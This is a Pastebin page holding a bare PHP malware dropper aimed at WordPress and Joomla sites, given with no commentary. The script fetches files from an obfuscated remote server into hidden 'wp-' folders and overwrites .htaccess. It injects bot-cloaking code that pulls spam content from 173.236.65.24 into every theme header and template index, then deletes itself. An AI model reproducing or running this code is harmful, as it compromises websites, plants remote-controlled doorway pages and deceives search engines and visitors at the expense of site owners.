API tools faq
paste
Advertisement
Guest User

Demonio 1

a guest
Apr 18th, 2017
627
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
PHP 9.09 KB | None | 0 0
raw download clone embed print report
  1. <?php
  2.  
  3. $scriptname= str_replace("/", "", $_SERVER["SCRIPT_NAME"]);
  4. $p1 = 1+2+2+round(cos(90)); $p2 = 10+5+10+10+10+round(cos(90)); $p3 = 10+20+20+20+9; $p4 = 1+2+2+5+5; $adddr = $p1.".".$p2.".".$p3.".".$p4;
  5.  
  6. $let = array (q,w,e,r,t,y,u,i,o,p,a,s,d,f,g,h,j,k,l,z,x,c,v,b,n,m,q,w,e,r,t,y,u,i,o,p,a,s,d,f,g,h,j,k,l,z,x,c,v,b,n,m);    
  7. $dirname='wp-';    
  8. for ($ns=0;$ns<rand(4,4);$ns++)    
  9. {    
  10. $r = rand (0,count($let)-1);    
  11. $dirname .= $let[$r];    
  12. }  
  13. $dirname2='wp-';    
  14. for ($ns=0;$ns<rand(4,4);$ns++)    
  15. {    
  16. $r = rand (0,count($let)-1);    
  17. $dirname2 .= $let[$r];    
  18. }  
  19.  
  20.    
  21.          
  22. mkdir("$dirname", 0777);
  23. mkdir("$dirname2", 0777);
  24.  
  25.    
  26.  
  27. if (file_exists ($dirname))
  28. {
  29.     mkdir($dirname."/yvsdbh35", 0777);
  30.     mkdir($dirname."/papkaa17", 0777);
  31.     mkdir($dirname2."/yvsdbh35", 0777);
  32.     mkdir($dirname2."/papkaa17", 0777);
  33.    
  34.     for($nnn=1;$nnn<10;$nnn++)
  35. {
  36.  $ch = curl_init();  
  37. curl_setopt($ch, CURLOPT_URL, "http://$adddr/doorgen2/$nnn.txt");
  38. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  39. curl_setopt($ch, CURLOPT_USERAGENT,'Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:1.8.0.6) Gecko/20060928 Firefox/1.5.0.6');
  40. $result = curl_exec($ch);
  41. curl_close($ch);
  42. $z = fopen("$dirname/papkaa17/$nnn.txt", "w");
  43. fwrite($z, $result);
  44. fclose($z);
  45.  
  46.  $ch = curl_init();  
  47. curl_setopt($ch, CURLOPT_URL, "http://$adddr/doorgen2/z$nnn.txt");
  48. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  49. curl_setopt($ch, CURLOPT_USERAGENT,'Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:1.8.0.6) Gecko/20060928 Firefox/1.5.0.6');
  50. $result = curl_exec($ch);
  51. curl_close($ch);
  52. $z = fopen("$dirname2/papkaa17/$nnn.txt", "w");
  53. fwrite($z, $result);
  54. fclose($z);
  55. }
  56.  
  57. $ch = curl_init();
  58. curl_setopt($ch, CURLOPT_URL, "http://$adddr/doorgen2/htaccess.txt");
  59. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  60. curl_setopt($ch, CURLOPT_USERAGENT,'Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:1.8.0.6) Gecko/20060928 Firefox/1.5.0.6');
  61. $result = curl_exec($ch);
  62. curl_close($ch);
  63. $z = fopen("$dirname/.htaccess", "w");
  64. fwrite($z, $result);
  65. fclose($z);
  66. $z = fopen("$dirname2/.htaccess", "w");
  67. fwrite($z, $result);
  68. fclose($z);
  69.  
  70. chmod("$dirname/.htaccess", 0444);
  71. chmod("$dirname2/.htaccess", 0444);
  72.    
  73.  $ch = curl_init();  
  74. curl_setopt($ch, CURLOPT_URL, "http://$adddr/doorgen2/update.txt");
  75. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  76. curl_setopt($ch, CURLOPT_USERAGENT,'Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:1.8.0.6) Gecko/20060928 Firefox/1.5.0.6');
  77. $result = curl_exec($ch);
  78. curl_close($ch);
  79. $z = fopen("$dirname/update.php", "w");
  80. fwrite($z, $result);
  81. fclose($z);
  82. $z = fopen("$dirname/yvsdbh35/update.txt", "w");
  83. fwrite($z, $result);
  84. fclose($z);
  85. $z = fopen("$dirname2/update.php", "w");
  86. fwrite($z, $result);
  87. fclose($z);
  88. $z = fopen("$dirname2/yvsdbh35/update.txt", "w");
  89. fwrite($z, $result);
  90. fclose($z);
  91.    
  92.    chmod ("$dirname/update.php", 0644);
  93.    chmod ("$dirname2/update.php", 0644);
  94.    
  95.  $ch = curl_init();  
  96. curl_setopt($ch, CURLOPT_URL, "http://$adddr/doorgen2/sexthe.txt");
  97. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  98. curl_setopt($ch, CURLOPT_USERAGENT,'Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:1.8.0.6) Gecko/20060928 Firefox/1.5.0.6');
  99. $result = curl_exec($ch);
  100. curl_close($ch);
  101.    
  102. $z = fopen("$dirname/yvsdbh35/sexthe.php", "w");
  103. fwrite($z, $result);
  104. fclose($z);
  105. $z = fopen("$dirname2/yvsdbh35/sexthe.php", "w");
  106. fwrite($z, $result);
  107. fclose($z);
  108.    chmod ("$dirname/yvsdbh35/sexthe.php", 0644);
  109.    chmod ("$dirname2/yvsdbh35/sexthe.php", 0644);
  110.    
  111. $url = 'http://'.$_SERVER['HTTP_HOST'].$_SERVER['REQUEST_URI'];
  112.  
  113. $string = $url;
  114. $string = explode("/", $string);
  115.  
  116. $url = "";
  117.  
  118. $n=1;
  119. $end = sizeof($string)-1;
  120. foreach ($string as $a)
  121. {
  122. $url .= $a."/";
  123. $n++;
  124. if ($n > $end ) break;
  125. }
  126. echo "<b><b><b>$url$dirname|$url$dirname2</b></b></b>";
  127.    
  128. }
  129. /*
  130.     $dirs = scandir(".");
  131.     foreach ($dirs as $dir)
  132.     {
  133.         if ((file_exists("$dir/.htaccess")) and ((file_exists("$dir/update.php")) OR (file_exists("$dir/update.php.suspected"))))
  134.         {
  135. $out = fopen("$dir/.htaccess", "w");
  136.  
  137. fwrite ($out, "RewriteEngine On
  138. ");
  139. if (file_exists("$dir/update.php.suspected")) rename("$dir/update.php.suspected", "$dir/update.php");
  140.         }
  141.     }
  142. */
  143.     chmod (".htaccess", 0777);
  144.     $outht = fopen(".htaccess", "w");
  145. fwrite($outht, "# BEGIN WordPress
  146. <IfModule mod_rewrite.c>
  147. RewriteEngine On
  148. RewriteBase /
  149. RewriteRule ^index\.php$ - [L]
  150. RewriteCond %{REQUEST_FILENAME} !-f
  151. RewriteCond %{REQUEST_FILENAME} !-d
  152. RewriteRule . /index.php [L]
  153. </IfModule>
  154.  
  155. # END WordPress");
  156. fclose($outht);
  157.  
  158. @unlink(sys_get_temp_dir());
  159.  
  160.  
  161. $code = '
  162.  
  163.  
  164. <?php
  165. $user_agent_to_filter = array( \'#Ask\s*Jeeves#i\', \'#HP\s*Web\s*PrintSmart#i\', \'#HTTrack#i\', \'#IDBot#i\', \'#Indy\s*Library#\',
  166.                               \'#ListChecker#i\', \'#MSIECrawler#i\', \'#NetCache#i\', \'#Nutch#i\', \'#RPT-HTTPClient#i\',
  167.                               \'#rulinki\.ru#i\', \'#Twiceler#i\', \'#WebAlta#i\', \'#Webster\s*Pro#i\',\'#www\.cys\.ru#i\',
  168.                               \'#Wysigot#i\', \'#Yahoo!\s*Slurp#i\', \'#Yeti#i\', \'#Accoona#i\', \'#CazoodleBot#i\',
  169.                               \'#CFNetwork#i\', \'#ConveraCrawler#i\',\'#DISCo#i\', \'#Download\s*update#i\', \'#FAST\s*MetaWeb\s*Crawler#i\',
  170.                               \'#Flexum\s*spider#i\', \'#Gigabot#i\', \'#HTMLParser#i\', \'#ia_archiver#i\', \'#ichiro#i\',
  171.                               \'#IRLbot#i\', \'#Java#i\', \'#km\.ru\s*bot#i\', \'#kmSearchBot#i\', \'#libwww-perl#i\',
  172.                               \'#Lupa\.ru#i\', \'#LWP::Simple#i\', \'#lwp-trivial#i\', \'#Missigua#i\', \'#MJ12bot#i\',
  173.                               \'#msnbot#i\', \'#msnbot-media#i\', \'#Offline\s*Explorer#i\', \'#OmniExplorer_Bot#i\',
  174.                               \'#PEAR#i\', \'#psbot#i\', \'#Python#i\', \'#rulinki\.ru#i\', \'#SMILE#i\',
  175.                               \'#Speedy#i\', \'#Teleport\s*Pro#i\', \'#TurtleScanner#i\', \'#User-Agent#i\', \'#voyager#i\',
  176.                               \'#Webalta#i\', \'#WebCopier#i\', \'#WebData#i\', \'#WebZIP#i\', \'#Wget#i\',
  177.                               \'#Yandex#i\', \'#Yanga#i\', \'#Yeti#i\',\'#msnbot#i\',
  178.                               \'#spider#i\', \'#yahoo#i\', \'#jeeves#i\' ,\'#google#i\' ,\'#altavista#i\',
  179.                               \'#scooter#i\' ,\'#av\s*fetch#i\' ,\'#asterias#i\' ,\'#spiderthread revision#i\' ,\'#sqworm#i\',
  180.                               \'#ask#i\' ,\'#lycos.spider#i\' ,\'#infoseek sidewinder#i\' ,\'#ultraseek#i\' ,\'#polybot#i\',
  181.                               \'#webcrawler#i\', \'#robozill#i\', \'#gulliver#i\', \'#architextspider#i\', \'#yahoo!\s*slurp#i\',
  182.                               \'#charlotte#i\', \'#ngb#i\', \'#BingBot#i\' ) ;
  183.  
  184. if ( !empty( $_SERVER[\'HTTP_USER_AGENT\'] ) && ( FALSE !== strpos( preg_replace( $user_agent_to_filter, \'-NO-WAY-\', $_SERVER[\'HTTP_USER_AGENT\'] ), \'-NO-WAY-\' ) ) ){
  185.    $isbot = 1;
  186.     }
  187.  
  188. if( FALSE !== strpos( gethostbyaddr($_SERVER[\'REMOTE_ADDR\']), \'google\'))
  189. {
  190.    $isbot = 1;
  191. }
  192.  
  193. if(@$isbot){
  194.  
  195. $_SERVER[HTTP_USER_AGENT] = str_replace(" ", "-", $_SERVER[HTTP_USER_AGENT]);
  196. $ch = curl_init();    
  197.    curl_setopt($ch, CURLOPT_URL, "http://173.236.65.24/cakes/?useragent=$_SERVER[HTTP_USER_AGENT]&domain=$_SERVER[HTTP_HOST]");  
  198.    $result = curl_exec($ch);      
  199. curl_close ($ch);  
  200.  
  201.     echo $result;
  202. }
  203. ?>';
  204.  
  205.  
  206. if (file_exists("wp-content"))
  207. {
  208. if (file_exists("wp-content/themes"))
  209. {
  210.     $dirs = scandir("wp-content/themes");
  211.     foreach ($dirs as $dir)
  212.     {
  213.         if ((is_dir("wp-content/themes/$dir")) AND ($dir !== ".") AND ($dir !== ".."))
  214.         {
  215.             if (file_exists("wp-content/themes/$dir/header.php"))
  216.             {
  217.                           $file = fopen("wp-content/themes/".$dir."/header.php", "r");  
  218.                           $buffer = fread($file, filesize("wp-content/themes/".$dir."/header.php"));
  219.                           fclose($file);   
  220.                if (eregi('173.236.65.24', $buffer)==0)
  221.                {
  222.                  
  223.                             $in = fopen("wp-content/themes/".$dir."/header.php", "w");
  224.                              fwrite($in, $code);
  225.                              fwrite($in, $buffer);
  226.                              fclose($in);
  227.                 /*       
  228.                    $in = fopen("wp-content/themes/$dir/header.php", "a");
  229.                    fwrite($in, $code);
  230.                    fclose($in);
  231.                    */
  232.                }
  233.             }
  234.         }
  235.     }
  236. }
  237. }
  238.  
  239. if (file_exists("templates"))
  240. {
  241.      $dirs = scandir("templates");
  242.         foreach ($dirs as $dir)
  243.          {
  244.                  if ((is_dir("templates/$dir")) AND ($dir !== ".") AND ($dir !== ".."))
  245.                   {
  246.                       if (file_exists("templates/".$dir."/index.php"))
  247.                       {
  248.                           $file = fopen("templates/".$dir."/index.php", "r");  
  249.                           $buffer = fread($file, filesize("templates/".$dir."/index.php"));
  250.                           fclose($file);   
  251.                             if (eregi('173.236.65.24', $buffer)==0)
  252.                                    {
  253.                              $in = fopen("templates/".$dir."/index.php", "w");
  254.                              fwrite($in, $code);
  255.                              fwrite($in, $buffer);
  256.                              fclose($in);
  257.                                    }                                       
  258.                       }
  259.                   }
  260.          }
  261. }
  262.  
  263.  
  264. @unlink($scriptname);
  265.  
  266.  
  267.  
  268. ?>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!